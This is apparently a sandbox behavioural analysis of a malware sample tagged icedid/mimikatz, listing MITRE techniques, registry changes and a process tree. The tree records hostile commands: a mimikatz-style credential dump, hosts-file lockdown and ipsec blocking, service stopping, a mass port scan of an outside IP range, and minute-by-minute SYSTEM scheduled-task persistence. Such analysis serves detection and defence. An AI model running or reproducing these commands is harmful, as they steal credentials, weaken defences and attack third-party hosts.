Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	qwttvniyq.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tbutbbj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tbutbbj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wpcap.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mesuau.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	eztkisrdr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xohudmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-01-31_1aea3b4cfab52252bf4f0c8fb9437b60_hacktools_icedid_mimikatz.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3344	cmd.exe
1016	PING.EXE

NSIS installer 3 IoCs

installer

resource	yara_rule
behavioral2/files/0x0008000000023c50-6.dat	nsis_installer_2
behavioral2/files/0x0007000000023c58-15.dat	nsis_installer_1
behavioral2/files/0x0007000000023c58-15.dat	nsis_installer_2

Modifies data under HKEY_USERS 39 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	ypdiqfiui.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ypdiqfiui.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	tbutbbj.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ypdiqfiui.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ypdiqfiui.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ypdiqfiui.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ypdiqfiui.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ypdiqfiui.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ypdiqfiui.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ypdiqfiui.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	tbutbbj.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	tbutbbj.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	tbutbbj.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ypdiqfiui.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ypdiqfiui.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	tbutbbj.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ypdiqfiui.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	ypdiqfiui.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	tbutbbj.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	ypdiqfiui.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ypdiqfiui.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ypdiqfiui.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ypdiqfiui.exe

Modifies registry class 14 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	tbutbbj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	tbutbbj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	tbutbbj.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1016	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1536	schtasks.exe
1940	schtasks.exe
1552	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe

Suspicious behavior: LoadsDriver 15 IoCs

pid	Process
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
2476	2025-01-31_1aea3b4cfab52252bf4f0c8fb9437b60_hacktools_icedid_mimikatz.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

description	pid	Process
Token: SeDebugPrivilege	2476	2025-01-31_1aea3b4cfab52252bf4f0c8fb9437b60_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege	1008	tbutbbj.exe
Token: SeDebugPrivilege	224	tbutbbj.exe
Token: SeDebugPrivilege	2824	vfshost.exe
Token: SeDebugPrivilege	4840	ypdiqfiui.exe
Token: SeLockMemoryPrivilege	4328	iakeqk.exe
Token: SeLockMemoryPrivilege	4328	iakeqk.exe
Token: SeDebugPrivilege	1488	ypdiqfiui.exe
Token: SeDebugPrivilege	780	ypdiqfiui.exe
Token: SeDebugPrivilege	1472	ypdiqfiui.exe
Token: SeDebugPrivilege	2412	ypdiqfiui.exe
Token: SeDebugPrivilege	3216	ypdiqfiui.exe
Token: SeDebugPrivilege	4180	ypdiqfiui.exe
Token: SeDebugPrivilege	2052	ypdiqfiui.exe
Token: SeDebugPrivilege	1480	ypdiqfiui.exe
Token: SeDebugPrivilege	812	ypdiqfiui.exe
Token: SeDebugPrivilege	1792	ypdiqfiui.exe
Token: SeDebugPrivilege	816	ypdiqfiui.exe
Token: SeDebugPrivilege	3420	ypdiqfiui.exe
Token: SeDebugPrivilege	3948	ypdiqfiui.exe
Token: SeDebugPrivilege	3844	ypdiqfiui.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
2476	2025-01-31_1aea3b4cfab52252bf4f0c8fb9437b60_hacktools_icedid_mimikatz.exe
2476	2025-01-31_1aea3b4cfab52252bf4f0c8fb9437b60_hacktools_icedid_mimikatz.exe
1008	tbutbbj.exe
1008	tbutbbj.exe
224	tbutbbj.exe
224	tbutbbj.exe
4756	xohudmc.exe
4712	mesuau.exe
2972	tbutbbj.exe
2972	tbutbbj.exe
4484	tbutbbj.exe
4484	tbutbbj.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2476 wrote to memory of 3344	2476	2025-01-31_1aea3b4cfab52252bf4f0c8fb9437b60_hacktools_icedid_mimikatz.exe	86
PID 2476 wrote to memory of 3344	2476	2025-01-31_1aea3b4cfab52252bf4f0c8fb9437b60_hacktools_icedid_mimikatz.exe	86
PID 2476 wrote to memory of 3344	2476	2025-01-31_1aea3b4cfab52252bf4f0c8fb9437b60_hacktools_icedid_mimikatz.exe	86
PID 3344 wrote to memory of 1016	3344	cmd.exe	88
PID 3344 wrote to memory of 1016	3344	cmd.exe	88
PID 3344 wrote to memory of 1016	3344	cmd.exe	88
PID 3344 wrote to memory of 1008	3344	cmd.exe	89
PID 3344 wrote to memory of 1008	3344	cmd.exe	89
PID 3344 wrote to memory of 1008	3344	cmd.exe	89
PID 224 wrote to memory of 624	224	tbutbbj.exe	91
PID 224 wrote to memory of 624	224	tbutbbj.exe	91
PID 224 wrote to memory of 624	224	tbutbbj.exe	91
PID 624 wrote to memory of 3240	624	cmd.exe	93
PID 624 wrote to memory of 3240	624	cmd.exe	93
PID 624 wrote to memory of 3240	624	cmd.exe	93
PID 624 wrote to memory of 4480	624	cmd.exe	94
PID 624 wrote to memory of 4480	624	cmd.exe	94
PID 624 wrote to memory of 4480	624	cmd.exe	94
PID 624 wrote to memory of 2880	624	cmd.exe	95
PID 624 wrote to memory of 2880	624	cmd.exe	95
PID 624 wrote to memory of 2880	624	cmd.exe	95
PID 624 wrote to memory of 4420	624	cmd.exe	96
PID 624 wrote to memory of 4420	624	cmd.exe	96
PID 624 wrote to memory of 4420	624	cmd.exe	96
PID 624 wrote to memory of 672	624	cmd.exe	97
PID 624 wrote to memory of 672	624	cmd.exe	97
PID 624 wrote to memory of 672	624	cmd.exe	97
PID 624 wrote to memory of 1940	624	cmd.exe	98
PID 624 wrote to memory of 1940	624	cmd.exe	98
PID 624 wrote to memory of 1940	624	cmd.exe	98
PID 224 wrote to memory of 2248	224	tbutbbj.exe	99
PID 224 wrote to memory of 2248	224	tbutbbj.exe	99
PID 224 wrote to memory of 2248	224	tbutbbj.exe	99
PID 224 wrote to memory of 4800	224	tbutbbj.exe	101
PID 224 wrote to memory of 4800	224	tbutbbj.exe	101
PID 224 wrote to memory of 4800	224	tbutbbj.exe	101
PID 224 wrote to memory of 4512	224	tbutbbj.exe	103
PID 224 wrote to memory of 4512	224	tbutbbj.exe	103
PID 224 wrote to memory of 4512	224	tbutbbj.exe	103
PID 224 wrote to memory of 1228	224	tbutbbj.exe	105
PID 224 wrote to memory of 1228	224	tbutbbj.exe	105
PID 224 wrote to memory of 1228	224	tbutbbj.exe	105
PID 1228 wrote to memory of 1408	1228	cmd.exe	107
PID 1228 wrote to memory of 1408	1228	cmd.exe	107
PID 1228 wrote to memory of 1408	1228	cmd.exe	107
PID 1408 wrote to memory of 4136	1408	wpcap.exe	108
PID 1408 wrote to memory of 4136	1408	wpcap.exe	108
PID 1408 wrote to memory of 4136	1408	wpcap.exe	108
PID 4136 wrote to memory of 684	4136	net.exe	110
PID 4136 wrote to memory of 684	4136	net.exe	110
PID 4136 wrote to memory of 684	4136	net.exe	110
PID 1408 wrote to memory of 3060	1408	wpcap.exe	111
PID 1408 wrote to memory of 3060	1408	wpcap.exe	111
PID 1408 wrote to memory of 3060	1408	wpcap.exe	111
PID 3060 wrote to memory of 1452	3060	net.exe	113
PID 3060 wrote to memory of 1452	3060	net.exe	113
PID 3060 wrote to memory of 1452	3060	net.exe	113
PID 1408 wrote to memory of 1472	1408	wpcap.exe	114
PID 1408 wrote to memory of 1472	1408	wpcap.exe	114
PID 1408 wrote to memory of 1472	1408	wpcap.exe	114
PID 1472 wrote to memory of 1332	1472	net.exe	116
PID 1472 wrote to memory of 1332	1472	net.exe	116
PID 1472 wrote to memory of 1332	1472	net.exe	116
PID 1408 wrote to memory of 3456	1408	wpcap.exe	117

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2100
- C:\Windows\TEMP\hnmbtkiin\iakeqk.exe
  "C:\Windows\TEMP\hnmbtkiin\iakeqk.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4328

C:\Users\Admin\AppData\Local\Temp\2025-01-31_1aea3b4cfab52252bf4f0c8fb9437b60_hacktools_icedid_mimikatz.exe
"C:\Users\Admin\AppData\Local\Temp\2025-01-31_1aea3b4cfab52252bf4f0c8fb9437b60_hacktools_icedid_mimikatz.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2476
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\bptuvtrj\tbutbbj.exe
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:3344
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:1016
- - C:\Windows\bptuvtrj\tbutbbj.exe
    C:\Windows\bptuvtrj\tbutbbj.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:1008

C:\Windows\bptuvtrj\tbutbbj.exe
C:\Windows\bptuvtrj\tbutbbj.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:224
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:624
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3240
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    PID:4480
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2880
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    PID:4420
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:672
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1940
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static del all
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2248
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:4800
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4512
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\vieiitfbt\tbntqyuzn\wpcap.exe /S
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1228
- - C:\Windows\vieiitfbt\tbntqyuzn\wpcap.exe
    C:\Windows\vieiitfbt\tbntqyuzn\wpcap.exe /S
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1408
  - - C:\Windows\SysWOW64\net.exe
      net stop "Boundary Meter"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4136
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Boundary Meter"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:684
  - - C:\Windows\SysWOW64\net.exe
      net stop "TrueSight Meter"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3060
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "TrueSight Meter"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1452
  - - C:\Windows\SysWOW64\net.exe
      net stop npf
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1472
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1332
  - - C:\Windows\SysWOW64\net.exe
      net start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:3456
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3524
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  PID:2776
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:656
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:4132
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3840
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2340
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      PID:4972
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\vieiitfbt\tbntqyuzn\eztkisrdr.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\vieiitfbt\tbntqyuzn\Scant.txt
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3576
- - C:\Windows\vieiitfbt\tbntqyuzn\eztkisrdr.exe
    C:\Windows\vieiitfbt\tbntqyuzn\eztkisrdr.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\vieiitfbt\tbntqyuzn\Scant.txt
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:3928
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\vieiitfbt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\vieiitfbt\Corporate\log.txt
  2⤵
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:548
- - C:\Windows\vieiitfbt\Corporate\vfshost.exe
    C:\Windows\vieiitfbt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2824
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "qjtubdvbc" /ru system /tr "cmd /c C:\Windows\ime\tbutbbj.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4428
- - C:\Windows\SysWOW64\schtasks.exe
